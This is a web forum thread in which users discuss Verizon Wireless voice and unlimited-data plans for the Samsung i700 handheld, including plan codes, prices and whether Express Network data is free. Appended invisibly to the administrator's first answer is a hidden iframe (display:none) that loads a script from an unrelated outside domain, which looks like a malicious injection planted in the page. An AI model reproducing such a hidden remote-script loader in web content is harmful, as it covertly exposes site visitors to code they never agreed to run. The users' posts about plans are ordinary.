+ Reply to Thread
    Editor and Site Administrator Convergent's Avatar

How do I find out what Verizon plans are available for i700?

The i700 is available for CDMA service through Verizon Wireless. You can learn about the plans available HERE.

A very economical plan is the $44.99 Unlimited Data Plan Code - WSUNL. This gives you unlimited data for browsing, email, and messages, and can be added to any voice plan.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Mike - Been Converged?

I just called Verizon, they tell me the WSUNL code is NOT valid.

Does anyone know the code? They tell me it's 79.00 to add unlimited minutes

Express Network is now free!

As of June 2, anyone with a Verizon national calling/roaming gets the Express Network high speed bandwidth for free. I had to call their Mobile Web tech support and get that person to stay online to talk the phone support person thru it but it works and its free!
    regards
    trent

Re: Express Network is now free!

Originally posted by "tpoltron"

As of June 2, anyone with a Verizon national calling/roaming gets the Express Network high speed bandwidth for free. I had to call their Mobile Web tech support and get that person to stay online to talk the phone support person thru it but it works and its free!
    regards
    trent

Is this Verizon service available to Canadians working in Canada?

I read one review stating that web-surfing, etc., simply uses Verizon voice minutes. Does Unlimited Data mean data transfer time is all paid for and unlimited, or was the review right?

Unlimited Data Service

To answer my own question: I purchased America's Choice 400 Unlimited Data from Verizon for under $80/mo (total after discounts). I was told that data transfers will NOT consume part of the 400 minutes.

Nothing is for Free

I believe it is a little misleading to suggest data time/megabits are free. Verizon uses two methods to charge for data. One uses plans minutes which is called Quick2Net. The other is per megabit usage called ExpressNet and has an unlimited option.

If someone finds a free option, please let me know.

Mike

What plans do most of you have? I started with a normal cell phone, so I have a good plan for voice, but I need a plan with internet coverage now that I got my new toy. Do any of you have any opinions about unlinited internet use with the i700? Is is worth it?

Thanks
    Gater Hater
    We are what we repeatedly do. Excellence is not an act but a habit.

Aristotle

With the newer 2003 OS and the always on feature, unlimited data is nice to have. It's a bit pricey from VZW, though. When I had it...$45/month. Better than going over your mb limit, though!
    My sordid past:

Kyocera 6035, Kyocera 7135, Samsung i700, iPAQ 6315, iPAQ hx4705, Motorola a630, BB 7100t, iPAQ rx3115, JAM 850, BB 8700g, Samsung i320 (just for fun), imate KJAM, TMO SDA, MDA, TMO Wing

i am an unlimited data plan user. i do pay for it ($45/mth), but that way i can listen to music all day long. i dont know what the "always on" feature problem people are having. the "always on" feature i found was that i can dial up #777, and as long as no data is going across it, i can answer incoming phone calls. after the call, i go back to express network w/o having to log back in to the service.
    Nephi
    "Thy days are known, and thy years shall not be numbered less; therefore, fear not what man can do, for God shall be with you forever and ever." -- D&C 122:9